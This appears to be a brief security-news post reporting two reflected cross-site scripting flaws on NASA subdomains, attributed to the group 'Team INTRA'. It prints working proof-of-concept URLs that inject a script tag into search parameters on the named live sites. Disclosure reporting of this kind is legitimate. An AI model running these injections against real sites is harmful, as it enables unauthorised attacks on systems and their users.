Two XSS Vulnerabilities found in NASA websites by Team INTRA

The well known Hacker group "Team INTRA" discovered two XSS Vulnerabilities in NASA websites.  The vulnerabilities found in sub domain of nasa.gov , LANCE - Land Atmosphere Near real-time Capability for EOS(lance.nasa.gov) and EOSDIS - Earth Data Website (earthdata.nasa.gov) .

Vulnerability Details:

Type: Reflected-XSS

Target: nasa.gov
Author: Team Intra
Vulnerable link:

• http://lance.nasa.gov/?s=<script>alert("HaxOr///INTRA");</script>
• http://earthdata.nasa.gov/search?term=<script>alert("HaxOr///INTRA");</script>&site[1]=1&form_id=search-earthdata

Hacker said this is tribute to TinKode. Tinkode is one of famous hacker who Vulnerabilities in Government sites including NASA websites and exposed it. Few days back, Romanian authorities arrested a suspect as Tinkode.